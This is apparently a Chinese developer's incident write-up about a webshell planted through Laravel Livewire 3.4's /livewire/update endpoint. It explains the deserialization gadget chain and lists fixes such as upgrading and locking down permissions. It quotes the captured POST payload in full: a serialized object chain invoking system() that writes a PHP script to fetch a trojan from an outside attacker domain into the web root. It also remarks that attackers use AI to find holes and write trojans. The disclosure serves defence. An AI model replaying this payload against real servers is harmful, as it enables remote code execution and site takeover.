一个没啥用的老项目，阿里云发信息给我已被webshell

版本为 :
“laravel/framework”: “10”,
livewire v3.4.10

• 攻击者构造了 Illuminate\Broadcasting\BroadcastEvent（Laravel 框架的广播事件类）的序列化对象，这是 Laravel 框架的核心类，通常会被框架自动反序列化处理；
• 序列化字符串中嵌套了 PendingBroadcast/Validator 等 Laravel 内置类，目的是绕过框架的反序列化过滤（利用框架自身类的属性可控性）；
• 关键是将恶意命令写入 PendingBroadcast 类的 *event 属性中，当框架反序列化这个对象并执行 handle/__destruct 等魔术方法时，会触发该属性的内容执行。

入侵入口是：

/livewire/update

post内容：

chained:O:38:"Illuminate\Broadcasting\BroadcastEvent":4:{s:5:"dummy";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"*events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"*event";s:371:"echo ‘ <?php $url ＝ ‘https://kontoolodon.live/m4ke-0v3r.txt‘; $file ＝ ‘/var/www/html/0v3r.php‘; file_put_contents($file, file_get_contents($url)); echo "Downloaded: " . (file_exists($file) ? ‘YES‘ : ‘NO‘); ?> ‘ > /tmp/download.php";}s:10:"connection";N;s:5:"queue";N;s:5:"event";O:37:"Illuminate\Notifications\Notification":0:{}}

会在根目录出现两个木马

“livewire/livewire”: “^3.4” 这个版本如果有线上运行的，马上升级或做权限安全处理

现在AI盛行，攻击者可以直接让ai去查看开源软件那里有漏洞，直接让ai写注入木马

应对：

1. 加入防火墙
2. 项目防篡改权限
3. 升级框架
4. 庆幸是没啥用的项目

本作品采用《CC 协议》，转载必须注明作者和本文链接